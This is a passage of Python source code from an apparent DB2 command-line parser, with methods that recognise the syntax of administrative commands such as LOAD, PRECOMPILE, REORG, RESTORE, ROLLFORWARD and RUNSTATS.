if self._match_sequence(['SET', 'INTEGRITY']):
self._expect_sequence(['PENDING', 'CASCADE'])
self._expect_one_of(['DEFERRED', 'IMMEDIATE'])
if self._match('LOCK'):
self._expect_sequence(['WITH', 'FORCE'])
if self._match('SOURCEUSEREXIT'):
self._expect_clp_string()
if self._match('REDIRECT'):
if self._match('INPUT'):
self._expect('FROM')
self._expect_one_of(['BUFFER', 'FILE'])
self._expect_clp_string()
if self._match('OUTPUT'):
self._expect_sequence(['TO', 'FILE'])
self._expect_clp_string()
self._match_sequence(['PARTITIONED', 'DB', 'CONFIG'])
while True:
if self._match('MODE'):
self._expect_one_of([
'PARTITION_AND_LOAD',
'PARTITION_ONLY',
'LOAD_ONLY',
'LOAD_ONLY_VERIFY_PART',
'ANALYZE',
])
elif self._match('ISOLATE_PART_ERRS'):
self._expect_one_of([
'SETUP_ERRS_ONLY',
'LOAD_ERRS_ONLY',
'SETUP_AND_LOAD_ERRS',
'NO_ISOLATION',
])
elif self._match_one_of(['PART_FILE_LOCATION', 'MAP_FILE_INPUT', 'MAP_FILE_OUTPUT', 'DISTFILE']):
self._expect_clp_string()
elif self._match_one_of(['OUTPUT_DBPARTNUMS', 'PARTITIONING_DBPARTNUMS']):
self._expect('(')
while True:
self._expect(TT.NUMBER)
if self._match('TO'):
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
elif self._match_one_of(['MAXIMUM_PART_AGENTS', 'STATUS_INTERVAL', 'TRACE', 'RUN_STAT_DBPARTNUM']):
self._expect(TT.NUMBER)
elif self._match('PORT_RANGE'):
self._expect_sequence(['(', TT.NUMBER, ',', TT.NUMBER, ')'])
elif self._match_one_of(['CHECK_TRUNCATION', 'NEWLINE', 'OMIT_HEADER']):
pass
else:
break
def _parse_load_query_command(self):
"""Parses a LOAD QUERY command"""
# LOAD QUERY already matched
self._expect('TABLE')
self._parse_table_name()
if self._match('TO'):
self._expect_clp_string()
self._match_one_of(['NOSUMMARY', 'SUMMARYONLY'])
self._match('SHOWDELTA')
def _parse_migrate_db_command(self):
"""Parses a MIGRATE DB command"""
# MIGRATE [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_on_command(self):
"""Parses the custom (non-CLP) ON SQLCODE|SQLSTATE|ERROR|REGEX command"""
# ON already matched
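        # Example of the accepted syntax (values illustrative):
        #   ON SQLCODE -911 WAIT 30 SECONDS AND RETRY STATEMENT 5 TIMES THEN CONTINUE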
if self._match('SQLCODE'):
if self._match((TT.OPERATOR, '-')):
self._expect(TT.NUMBER)
else:
self._expect_one_of([TT.STRING, TT.NUMBER])
elif self._match('SQLSTATE'):
self._expect(TT.STRING)
elif self._match('ERROR'):
pass
elif self._match('REGEX'):
self._expect(TT.STRING)
else:
self._expected_one_of(['SQLCODE', 'SQLSTATE', 'ERROR', 'REGEX'])
wait = False
if self._match('WAIT'):
wait = True
self._expect(TT.NUMBER)
self._expect_one_of(['SECOND', 'SECONDS', 'MINUTE', 'MINUTES', 'HOUR', 'HOURS'])
self._match('AND')
retry = False
if self._match('RETRY'):
retry = True
self._expect_one_of(['STATEMENT', 'SCRIPT'])
if self._match(TT.NUMBER):
self._expect_one_of(['TIME', 'TIMES'])
self._match('THEN')
if wait and not retry:
self._expected('RETRY')
self._expect_one_of(['FAIL', 'STOP', 'CONTINUE', 'IGNORE'])
def _parse_ping_command(self):
"""Parses a PING command"""
# PING already matched
self._expect_clp_string()
if self._match('REQUEST'):
self._expect(TT.NUMBER)
if self._match('RESPONSE'):
self._expect(TT.NUMBER)
if self._match(TT.NUMBER):
self._match_one_of(['TIME', 'TIMES'])
def _parse_precompile_command(self):
"""Parses a PRECOMPILE command"""
# [PREP|PRECOMPILE] already matched
# XXX Can these parameters be specified in any order?
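        # Hypothetical example (names illustrative); note this parser accepts
        # the options only in the order they are tested below:
        #   PREP program.sqc BINDFILE ISOLATION CS MESSAGES prep.msg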
self._expect_clp_string()
if self._match('ACTION'):
if self._match_one_of(['ADD', 'REPLACE']).value == 'ADD':
pass
else:
if self._match('RETAIN'):
self._expect_one_of(['YES', 'NO'])
                if self._match('REPLVER'):
self._expect_clp_string()
if self._match('APREUSE'):
self._expect_one_of(['YES', 'NO'])
if self._match('BINDFILE'):
if self._match('USING'):
self._expect_clp_string()
if self._match('BLOCKING'):
self._expect_one_of(['UNAMBIG', 'ALL', 'NO'])
if self._match('COLLECTION'):
self._expect(TT.IDENTIFIER)
if self._match('CALL_RESOLUTION'):
self._expect_one_of(['IMMEDIATE', 'DEFERRED'])
if self._match('CCSIDG'):
self._expect(TT.NUMBER)
if self._match('CCSIDM'):
self._expect(TT.NUMBER)
if self._match('CCSIDS'):
self._expect(TT.NUMBER)
if self._match('CHARSUB'):
self._expect_one_of(['DEFAULT', 'BIT', 'MIXED', 'SBCS'])
if self._match('CNULREQD'):
self._expect_one_of(['YES', 'NO'])
if self._match('COLLECTION'):
self._expect(TT.IDENTIFIER)
self._match_one_of(['COMPILE', 'PRECOMPILE'])
if self._match('CONCURRENTACCESSRESOLUTION'):
if self._expect_one_of(['USE', 'WAIT']).value == 'USE':
self._expect_sequence(['CURRENTLY', 'COMMITTED'])
else:
self._expect_sequence(['FOR', 'OUTCOME'])
if self._match('CONNECT'):
self._expect(TT.NUMBER)
if self._match('DATETIME'):
self._expect_one_of(['DEF', 'EUR', 'ISO', 'JIS', 'LOC', 'USA'])
if self._match('DBPROTOCOL'):
self._expect_one_of(['DRDA', 'PRIVATE'])
if self._match('DEC'):
self._expect(TT.NUMBER)
if self._match('DECDEL'):
self._expect_one_of(['PERIOD', 'COMMA'])
if self._match('DEFERRED_PREPARE'):
self._expect_one_of(['NO', 'ALL', 'YES'])
if self._match('DEGREE'):
self._expect_one_of([TT.NUMBER, 'ANY'])
if self._match('DISCONNECT'):
self._expect_one_of(['EXPLICIT', 'AUTOMATIC', 'CONDITIONAL'])
if self._match('DYNAMICRULES'):
self._expect_one_of(['RUN', 'BIND', 'INVOKERUN', 'INVOKEBIND', 'DEFINERUN', 'DEFINEBIND'])
if self._match('ENCODING'):
self._expect_one_of(['ASCII', 'EBCDIC', 'UNICODE', 'CCSID'])
if self._match('EXPLAIN'):
self._expect_one_of(['NO', 'ALL', 'ONLY', 'REOPT', 'YES'])
if self._match('EXPLSNAP'):
self._expect_one_of(['NO', 'ALL', 'REOPT', 'YES'])
if self._match('EXTENDEDINDICATOR'):
self._expect_one_of(['YES', 'NO'])
if self._match('FEDERATED'):
self._expect_one_of(['YES', 'NO'])
if self._match('FEDERATED_ASYNCHRONY'):
self._expect_one_of([TT.NUMBER, 'ANY'])
if self._match('FUNCPATH'):
self._parse_ident_list()
if self._match('GENERIC'):
self._expect_clp_string()
        if self._match('IMMEDWRITE'):
self._expect_one_of(['NO', 'YES', 'PH1'])
if self._match('INSERT'):
self._expect_one_of(['DEF', 'BUF'])
if self._match('ISOLATION'):
self._expect_one_of(['CS', 'NC', 'RR', 'RS', 'UR'])
if self._match('KEEPDYNAMIC'):
self._expect_one_of(['YES', 'NO'])
if self._match('LANGLEVEL'):
self._expect_one_of(['SAA1', 'MIA', 'SQL92E'])
if self._match('LEVEL'):
self._expect(TT.IDENTIFIER)
if self._match('LONGERROR'):
self._expect_one_of(['YES', 'NO'])
if self._match('MESSAGES'):
self._expect_clp_string()
if self._match('NOLINEMACRO'):
pass
if self._match('OPTHINT'):
self._expect_clp_string()
if self._match('OPTLEVEL'):
self._expect(TT.NUMBER)
if self._match('OPTPROFILE'):
self._expect_clp_string()
if self._match('OS400NAMING'):
self._expect_one_of(['SYSTEM', 'SQL'])
if self._match('OUTPUT'):
self._expect_clp_string()
if self._match('OWNER'):
self._expect(TT.IDENTIFIER)
if self._match('PACKAGE'):
if self._match('USING'):
self._expect(TT.IDENTIFIER)
if self._match('PREPROCESSOR'):
self._expect_clp_string()
if self._match('QUALIFIER'):
self._expect(TT.IDENTIFIER)
if self._match('QUERYOPT'):
self._expect(TT.NUMBER)
if self._match('RELEASE'):
self._expect_one_of(['COMMIT', 'DEALLOCATE'])
if self._match('REOPT'):
self._expect_one_of(['NONE', 'ONCE', 'ALWAYS', 'VARS'])
if self._match_one_of(['REOPT', 'NOREOPT']):
self._expect('VARS')
if self._match('SQLCA'):
self._expect_one_of(['NONE', 'SAA'])
if self._match('SQLERROR'):
self._expect_one_of(['NOPACKAGE', 'CHECK', 'CONTINUE'])
if self._match('SQLFLAG'):
self._expect_one_of(['SQL92E', 'MVSDB2V23', 'MVSDB2V31', 'MVSDB2V41'])
self._expect('SYNTAX')
if self._match('SORTSEQ'):
self._expect_one_of(['JOBRUN', 'HEX'])
if self._match('SQLRULES'):
self._expect_one_of(['DB2', 'STD'])
if self._match('SQLWARN'):
self._expect_one_of(['YES', 'NO'])
if self._match('STATICREADONLY'):
self._expect_one_of(['YES', 'NO', 'INSENSITIVE'])
if self._match('STRDEL'):
self._expect_one_of(['APOSTROPHE', 'QUOTE'])
if self._match('SYNCPOINT'):
self._expect_one_of(['ONEPHASE', 'NONE', 'TWOPHASE'])
if self._match('SYNTAX'):
pass
if self._match('TARGET'):
self._expect_one_of(['IBMCOB', 'MFCOB', 'ANSI_COBOL', 'C', 'CPLUSPLUS', 'FORTRAN', 'BORLAND_C', 'BORLAND_CPLUSPLUS'])
if self._match('TEXT'):
self._expect_clp_string()
if self._match('TRANSFORM'):
self._expect('GROUP')
self._expect(TT.IDENTIFIER)
if self._match('VALIDATE'):
self._expect_one_of(['BIND', 'RUN'])
if self._match('WCHARTYPE'):
self._expect_one_of(['NOCONVERT', 'CONVERT'])
if self._match('VERSION'):
self._expect_clp_string()
def _parse_prune_history_command(self):
"""Parses a PRUNE HISTORY command"""
# PRUNE HISTORY already matched
self._expect(TT.NUMBER)
self._match_sequence(['WITH', 'FORCE', 'OPTION'])
self._match_sequence(['AND', 'DELETE'])
def _parse_prune_logfile_command(self):
"""Parses a PRUNE LOGFILE command"""
        # PRUNE LOGFILE already matched
self._expect_sequence(['PRIOR', 'TO'])
self._expect_clp_string()
def _parse_put_routine_command(self):
"""Parses a PUT ROUTINE command"""
# PUT ROUTINE already matched
self._expect('FROM')
self._expect_clp_string()
if self._match('OWNER'):
self._expect(TT.IDENTIFIER)
self._match_sequence(['USE', 'REGISTERS'])
def _parse_query_client_command(self):
"""Parses a QUERY CLIENT command"""
# QUERY CLIENT already matched
pass
def _parse_quiesce_command(self):
"""Parses a QUIESCE DB / INSTANCE command"""
# QUIESCE already matched
if self._match('INSTANCE'):
self._expect_clp_string()
if self._match_one_of(['USER', 'GROUP']):
self._expect(TT.IDENTIFIER)
self._match_sequence(['RESTRICTED', 'ACCESS'])
elif self._match_one_of(['DATABASE', 'DB']):
pass
else:
self._expected_one_of(['DATABASE', 'DB', 'INSTANCE'])
        if self._expect_one_of(['IMMEDIATE', 'DEFER']).value == 'DEFER':
if self._match('WITH'):
self._expect_sequence(['TIMEOUT', TT.NUMBER])
self._match_sequence(['FORCE', 'CONNECTIONS'])
def _parse_quiesce_tablespaces_command(self):
"""Parses a QUIESCE TABLESPACES command"""
# QUIESCE TABLESPACES already matched
self._expect_sequence(['FOR', 'TABLE'])
self._parse_table_name()
if self._expect_one_of(['SHARE', 'INTENT', 'EXCLUSIVE', 'RESET']).value == 'INTENT':
self._expect_sequence(['TO', 'UPDATE'])
def _parse_quit_command(self):
"""Parses a QUIT command"""
# QUIT already matched
pass
def _parse_rebind_command(self):
"""Parses a REBIND command"""
# REBIND already matched
self._match('PACKAGE')
self._parse_subschema_name()
if self._match('VERSION'):
self._expect_clp_string()
if self._match('APREUSE'):
self._expect_one_of(['YES', 'NO'])
if self._match('RESOLVE'):
self._expect_one_of(['ANY', 'CONSERVATIVE'])
if self._match('REOPT'):
self._expect_one_of(['NONE', 'ONCE', 'ALWAYS'])
def _parse_recover_db_command(self):
"""Parses a RECOVER DB command"""
# RECOVER [DATABASE|DB] already matched
self._expect_clp_string()
if self._match('TO'):
if self._match('END'):
self._expect_sequence(['OF', 'LOGS'])
self._parse_db_partitions_clause()
else:
self._expect_clp_string()
if self._match('USING'):
self._expect_one_of(['LOCAL', 'UTC'])
self._expect('TIME')
if self._match('ON'):
self._expect('ALL')
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
self._parse_login(optional=True, allowchange=False)
if self._match('USING'):
self._expect_sequence(['HISTORY', 'FILE'])
self._expect('(')
self._expect_clp_string()
if self._match(','):
while True:
self._expect_clp_string()
self._expect('ON')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
if self._match('OVERFLOW'):
self._expect_sequence(['LOG', 'PATH'])
self._expect('(')
self._expect_clp_string()
if self._match(','):
while True:
self._expect_clp_string()
self._expect('ON')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
if self._match('COMPRLIB'):
self._expect_clp_string()
if self._match('COMPROPTS'):
self._expect_clp_string()
self._match('RESTART')
def _parse_redistribute_database_partition_group_command(self):
"""Parses a REDISTRIBUTE DATABASE PARTITION GROUP command"""
# REDISTRIBUTE DATABASE PARTITION GROUP already matched
self._expect_clp_string()
self._match_sequence(['NOT', 'ROLLFORWARD', 'RECOVERABLE'])
        t = self._expect_one_of(['UNIFORM', 'USING', 'CONTINUE', 'ABORT']).value
partitions = False
if t == 'USING':
if self._expect_one_of(['DISTFILE', 'TARGETMAP']).value == 'DISTFILE':
partitions = True
self._expect_clp_string()
elif t == 'UNIFORM':
partitions = True
if partitions:
if self._match('ADD'):
self._parse_db_partition_list_clause(size=False)
if self._match('DROP'):
self._parse_db_partition_list_clause(size=False)
if self._match('TABLE'):
self._expect('(')
while True:
self._parse_table_name()
if not self._match(','):
break
self._expect(')')
self._match_one_of(['ONCE', 'FIRST'])
if self._match('INDEXING'):
self._expect('MODE')
self._expect_one_of(['REBUILD', 'DEFERRED'])
elif self._match('DATA'):
self._expect('BUFFER')
self._expect(TT.NUMBER)
elif self._match('STATISTICS'):
if self._expect_one_of(['USE', 'NONE']).value == 'USE':
self._expect('PROFILE')
elif self._match('STOP'):
self._expect('AT')
self._expect_clp_string()
def _parse_refresh_ldap_command(self):
"""Parses a REFRESH LDAP command"""
# REFRESH LDAP already matched
if self._match('CLI'):
self._expect('CFG')
elif self._match_one_of(['DB', 'NODE']):
self._expect('DIR')
elif self._match('IMMEDIATE'):
self._match('ALL')
else:
self._expected_one_of(['CLI', 'DB', 'NODE', 'IMMEDIATE'])
def _parse_register_command(self):
"""Parses a REGISTER command"""
# REGISTER already matched
self._match_sequence(['DB2', 'SERVER'])
self._match('IN')
self._match('ADMIN')
self._expect('LDAP')
self._expect_one_of(['NODE', 'AS'])
self._expect_clp_string()
self._expect('PROTOCOL')
if self._expect_one_of(['TCPIP', 'TCPIP4', 'TCPIP6', 'NPIPE']).value != 'NPIPE':
if self._match('HOSTNAME'):
self._expect_clp_string()
if self._match('SVCENAME'):
self._expect_clp_string()
self._match_sequence(['SECURITY', 'SOCKS'])
if self._match('REMOTE'):
self._expect_clp_string()
if self._match('INSTANCE'):
self._expect_clp_string()
if self._match('NODETYPE'):
self._expect_one_of(['SERVER', 'MPP', 'DCS'])
if self._match('OSTYPE'):
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_register_xmlschema_command(self):
"""Parses a REGISTER XMLSCHEMA command"""
# REGISTER XMLSCHEMA already matched
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
if self._match('AS'):
self._parse_subschema_name()
if self._match('('):
while True:
self._expect('ADD')
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
if self._match(')'):
break
if self._match('COMPLETE'):
if self._match('WITH'):
self._expect_clp_string()
if self._match('ENABLE'):
self._expect('DECOMPOSITION')
def _parse_register_xsrobject_command(self):
"""Parses a REGISTER XSROBJECT command"""
# REGISTER XSROBJECT already matched
self._expect_clp_string()
if self._match('PUBLIC'):
self._expect_clp_string()
self._expect('FROM')
self._expect_clp_string()
if self._match('AS'):
self._parse_subschema_name()
if self._match('EXTERNAL'):
self._expect('ENTITY')
else:
self._expect_one_of(['DTD', 'EXTERNAL'])
def _parse_reorg_command(self):
"""Parses a REORG command"""
def parse_table_clause():
if self._match('INDEX'):
self._parse_index_name()
if self._match('INPLACE'):
if not self._match_one_of(['STOP', 'PAUSE']):
if self._match('ALLOW'):
self._expect_one_of(['READ', 'WRITE'])
self._expect('ACCESS')
if self._match('NOTRUNCATE'):
self._expect('TABLE')
self._match_one_of(['START', 'RESUME'])
else:
if self._match('ALLOW'):
self._expect_one_of(['READ', 'NO'])
self._expect('ACCESS')
if self._match('USE'):
self._expect(TT.IDENTIFIER)
self._match('INDEXSCAN')
if self._match('LONGLOBDATA'):
if self._match('USE'):
self._expect(TT.IDENTIFIER)
self._match_one_of(['KEEPDICTIONARY', 'RESETDICTIONARY'])
def parse_index_clause():
if self._match('ALLOW'):
self._expect_one_of(['NO', 'WRITE', 'READ'])
self._expect('ACCESS')
if self._match_one_of(['CONVERT', 'CLEANUP']).value == 'CLEANUP':
self._expect('ONLY')
self._match_one_of(['ALL', 'PAGES'])
# REORG already matched
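        # Hypothetical examples (names illustrative, not from the source):
        #   REORG TABLE db2inst1.staff INDEX db2inst1.istaff ALLOW READ ACCESS
        #   REORG INDEXES ALL FOR TABLE db2inst1.staff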
if self._match('TABLE'):
self._parse_table_name()
if self._match('RECLAIM'):
self._expect_sequence(['EXTENTS', 'ONLY'])
if self._match('ALLOW'):
self._expect_one_of(['READ', 'WRITE', 'NO'])
self._expect('ACCESS')
else:
parse_table_clause()
elif self._match('INDEX'):
self._parse_index_name()
if self._match('FOR'):
self._expect('TABLE')
self._parse_table_name()
parse_index_clause()
elif self._match('INDEXES'):
self._expect_sequence(['ALL', 'FOR', 'TABLE'])
self._parse_table_name()
parse_index_clause()
else:
self._expected_one_of(['TABLE', 'INDEX', 'INDEXES'])
if self._match_sequence(['ON', 'DATA', 'PARTITION']):
self._expect(TT.IDENTIFIER)
self._parse_db_partitions_clause()
def _parse_reorgchk_command(self):
"""Parses a REORGCHK command"""
# REORGCHK already matched
if self._match_one_of(['UPDATE', 'CURRENT']):
self._expect('STATISTICS')
if self._match('ON'):
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif self._match('TABLE'):
if not self._match_one_of(['SYSTEM', 'USER', 'ALL']):
self._parse_table_name()
else:
self._expected_one_of(['SCHEMA', 'TABLE'])
def _parse_reset_admin_cfg_command(self):
"""Parses a RESET ADMIN CFG command"""
# RESET ADMIN [CONFIGURATION|CONFIG|CFG] already matched
if self._match('FOR'):
self._expect('NODE')
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_reset_alert_cfg_command(self):
"""Parses a RESET ALERT CFG command"""
# RESET ALERT [CONFIGURATION|CONFIG|CFG] already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match_one_of(['DBM', 'CONTAINERS', 'DATABASES', 'TABLESPACES'])
):
pass
elif (
self._match_sequence(['CONTAINER', TT.IDENTIFIER, 'FOR', TT.IDENTIFIER])
            or self._match_sequence(['TABLESPACE', TT.IDENTIFIER])
or self._match('DATABASE')
):
self._expect('ON')
self._expect_clp_string()
if self._match('USING'):
self._expect_clp_string()
def _parse_reset_db_cfg_command(self):
"""Parses a RESET DB CFG command"""
# RESET [DATABASE|DB] [CONFIGURATION|CONFIG|CFG] already matched
self._expect('FOR')
self._expect_clp_string()
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
def _parse_reset_dbm_cfg_command(self):
"""Parses a RESET DBM CFG command"""
# RESET [DATABASE MANAGER|DB MANAGER|DBM] [CONFIGURATION|CONFIG|CFG] already matched
pass
def _parse_reset_monitor_command(self):
"""Parses a RESET MONITOR command"""
# RESET MONITOR already matched
if self._match('ALL'):
self._match('DCS')
elif self._match('FOR'):
self._match('DCS')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
else:
self._expected_one_of(['ALL', 'FOR'])
self._parse_db_partition_clause()
def _parse_restart_db_command(self):
"""Parses a RESTART DB command"""
# RESTART [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('DROP'):
self._expect_sequence(['PENDING', 'TABLESPACES'])
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._expect(')')
self._match_sequence(['WRITE', 'RESUME'])
def _parse_restore_db_command(self):
"""Parses a RESTORE DB command"""
# RESTORE [DATABASE|DB] already matched
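        # Hypothetical example (names illustrative, not from the source):
        #   RESTORE DATABASE sample FROM /db2backup TAKEN AT 20100401120000 WITHOUT PROMPTING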
self._expect_clp_string()
if self._match_one_of(['CONTINUE', 'ABORT']):
pass
else:
self._parse_login(optional=True, allowchange=False)
if self._match('TABLESPACE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('SCHEMA'):
if self._match('('):
self._parse_ident_list()
self._expect(')')
self._match('ONLINE')
elif (
self._match_sequence(['HISTORY', 'FILE'])
or self._match_sequence(['COMPRESSION', 'LIBRARY'])
or self._match('LOGS')
):
self._match('ONLINE')
elif self._match('REBUILD'):
self._expect('WITH')
if self._match('ALL'):
self._expect_sequence(['TABLESPACES', 'IN'])
self._expect_one_of(['DATABASE', 'IMAGE'])
if self._match('EXCEPT'):
self._expect('TABLESPACE')
self._expect('(')
self._parse_ident_list()
self._expect(')')
else:
self._expect('TABLESPACE')
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('INCREMENTAL'):
self._match_one_of(['AUTO', 'AUTOMATIC', 'ABORT'])
if self._match('USE'):
self._match_one_of(['TSM', 'XBSA'])
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
elif self._match('FROM'):
self._parse_clp_string_list()
elif self._match('LOAD'):
self._expect_clp_string()
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
if self._match('TAKEN'):
self._expect('AT')
self._expect(TT.NUMBER)
if self._match('TO'):
self._expect_clp_string()
elif self._match('DBPATH'):
self._expect('ON')
self._expect_clp_string()
elif self._match('ON'):
self._parse_clp_string_list()
if self._match('DBPATH'):
self._expect('ON')
self._expect_clp_string()
if self._match('INTO'):
self._expect_clp_string()
if self._match('LOGTARGET'):
if self._match_one_of(['INCLUDE', 'EXCLUDE']):
self._match('FORCE')
else:
self._expect_clp_string()
if self._match('NEWLOGPATH'):
self._expect_clp_string()
if self._match('WITH'):
self._expect(TT.NUMBER)
self._expect('BUFFERS')
if self._match('BUFFER'):
self._expect(TT.NUMBER)
self._match_sequence(['REPLACE', 'HISTORY', 'FILE'])
self._match_sequence(['REPLACE', 'EXISTING'])
if self._match('REDIRECT'):
if self._match('GENERATE'):
self._expect('SCRIPT')
self._expect_clp_string()
if self._match('PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('COMPRLIB'):
self._expect_clp_string()
if self._match('COMPROPTS'):
self._expect_clp_string()
self._match_sequence(['WITHOUT', 'ROLLING', 'FORWARD'])
self._match_sequence(['WITHOUT', 'PROMPTING'])
def _parse_rewind_tape_command(self):
"""Parses a REWIND TAPE command"""
# REWIND TAPE already matched
if self._match('ON'):
self._expect_clp_string()
def _parse_rollforward_db_command(self):
"""Parses a ROLLFORWARD DB command"""
# ROLLFORWARD [DATABASE|DB] already matched
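        # Hypothetical example (names illustrative, not from the source):
        #   ROLLFORWARD DATABASE sample TO END OF LOGS AND COMPLETE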
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('TO'):
if self._match('END'):
self._expect('OF')
if self._expect_one_of(['LOGS', 'BACKUP']).value == 'BACKUP':
if self._match('ON'):
self._expect('ALL')
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
else:
self._parse_db_partitions_clause()
else:
self._expect(TT.NUMBER)
if self._match('ON'):
self._expect('ALL')
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
if self._match('USING'):
self._expect_one_of(['UTC', 'LOCAL'])
self._expect('TIME')
if self._match('AND'):
self._expect_one_of(['COMPLETE', 'STOP'])
elif self._match_one_of(['COMPLETE', 'STOP', 'CANCEL']):
self._parse_db_partitions_clause()
elif self._match('QUERY'):
self._expect('STATUS')
if self._match('USING'):
self._expect_one_of(['UTC', 'LOCAL'])
self._expect('TIME')
self._parse_db_partitions_clause()
if self._match('TABLESPACE'):
if not self._match('ONLINE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._match('ONLINE')
if self._match('OVERFLOW'):
self._expect_sequence(['LOG', 'PATH'])
self._expect('(')
self._expect_clp_string()
if self._match(','):
while True:
self._expect_clp_string()
self._expect('ON')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
self._match('NORETRIEVE')
if self._match('RECOVER'):
self._expect_sequence(['DROPPED', 'TABLE'])
self._expect_clp_string()
self._expect('TO')
self._expect_clp_string()
def _parse_runstats_command(self):
"""Parses a RUNSTATS command"""
def parse_index_options():
"""Parses the indexing clauses of a RUNSTATS command"""
# FOR/AND already matched
if self._match('SAMPLED'):
self._expect('DETAILED')
else:
self._match('DETAILED')
self._expect_one_of(['INDEX', 'INDEXES'])
if not self._match('ALL'):
while True:
self._parse_index_name()
if not self._match(','):
break
def parse_column_options(dist):
"""Parses column options clauses of a RUNSTATS command"""
# ON already matched
if (
self._match_sequence(['ALL', 'COLUMNS', 'AND', 'COLUMNS'])
or self._match_sequence(['KEY', 'COLUMNS', 'AND', 'COLUMNS'])
or self._match('COLUMNS')
):
self._expect('(')
while True:
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
if self._match('LIKE'):
self._expect('STATISTICS')
if dist:
while self._match_one_of(['NUM_FREQVALUES', 'NUM_QUANTILES']):
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
else:
self._expect_one_of(['ALL', 'KEY', 'COLUMNS'])
self._expect('COLUMNS')
# RUNSTATS already matched
self._expect_sequence(['ON', 'TABLE'])
self._parse_table_name()
if self._match_one_of(['USE', 'UNSET']):
self._expect('PROFILE')
else:
if self._match('FOR'):
parse_index_options()
self._match_sequence(['EXCLUDING', 'XML', 'COLUMNS'])
else:
if self._match('ON'):
parse_column_options(dist=False)
if self._match('WITH'):
self._expect('DISTRIBUTION')
if self._match('ON'):
parse_column_options(dist=True)
if self._match('DEFAULT'):
while self._match_one_of(['NUM_FREQVALUES', 'NUM_QUANTILES']):
self._expect(TT.NUMBER)
self._match_sequence(['EXCLUDING', 'XML', 'COLUMNS'])
if self._match('AND'):
parse_index_options()
if self._match('ALLOW'):
self._expect_one_of(['READ', 'WRITE'])
self._expect('ACCESS')
if self._match('TABLESAMPLE'):
self._expect_one_of(['SYSTEM', 'BERNOULLI'])
self._expect('(')
self._expect(TT.NUMBER)
self._expect(')')
if self._match('REPEATABLE'):
self._expect('(')
self._expect(TT.NUMBER)
self._expect(')')
if self._match('SET'):
self._expect('PROFILE')
self._match_one_of(['NONE', 'ONLY'])
elif self._match('UPDATE'):
self._expect('PROFILE')
self._match('ONLY')
if self._match('UTIL_IMPACT_PRIORITY'):
self._match(TT.NUMBER)
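    # Illustrative statements accepted by the grammar above (examples only):
    #   RUNSTATS ON TABLE db2inst1.sales USE PROFILE
    #   RUNSTATS ON TABLE db2inst1.sales ON ALL COLUMNS WITH DISTRIBUTION
    #       AND SAMPLED DETAILED INDEXES ALL ALLOW WRITE ACCESS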
def _parse_set_client_command(self):
"""Parses a SET CLIENT command"""
# SET CLIENT already matched
if self._match('CONNECT'):
self._expect(TT.NUMBER)
if self._match('DISCONNECT'):
self._expect_one_of(['EXPLICIT', 'CONDITIONAL', 'AUTOMATIC'])
if self._match('SQLRULES'):
self._expect_one_of(['DB2', 'STD'])
if self._match('SYNCPOINT'):
self._expect_one_of(['ONEPHASE', 'TWOPHASE', 'NONE'])
if self._match('CONNECT_DBPARTITIONNUM'):
self._expect_one_of(['CATALOG_DBPARTITIONNUM', TT.NUMBER])
if self._match('ATTACH_DBPARTITIONNUM'):
self._expect(TT.NUMBER)
def _parse_set_runtime_degree_command(self):
"""Parses a SET RUNTIME DEGREE command"""
# SET RUNTIME DEGREE already matched
self._expect('FOR')
if not self._match('ALL'):
self._expect('(')
while True:
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
self._expect('TO')
self._expect(TT.NUMBER)
def _parse_set_serveroutput_command(self):
"""Parses a SET SERVEROUTPUT command"""
# SET SERVEROUTPUT already matched
self._expect_one_of(['OFF', 'ON'])
def _parse_set_tablespace_containers_command(self):
"""Parses a SET TABLESPACE CONTAINERS command"""
# SET TABLESPACE CONTAINERS already matched
self._expect('FOR')
self._expect(TT.NUMBER)
if self._match_one_of(['REPLAY', 'IGNORE']):
self._expect_sequence(['ROLLFORWARD', 'CONTAINER', 'OPERATIONS'])
self._expect('USING')
if not self._match_sequence(['AUTOMATIC', 'STORAGE']):
self._expect('(')
while True:
if self._expect_one_of(['FILE', 'DEVICE', 'PATH']).value == 'PATH':
self._expect_clp_string()
else:
self._expect_clp_string()
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
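    # Illustrative statements accepted by the grammar above (examples only):
    #   SET TABLESPACE CONTAINERS FOR 2 USING AUTOMATIC STORAGE
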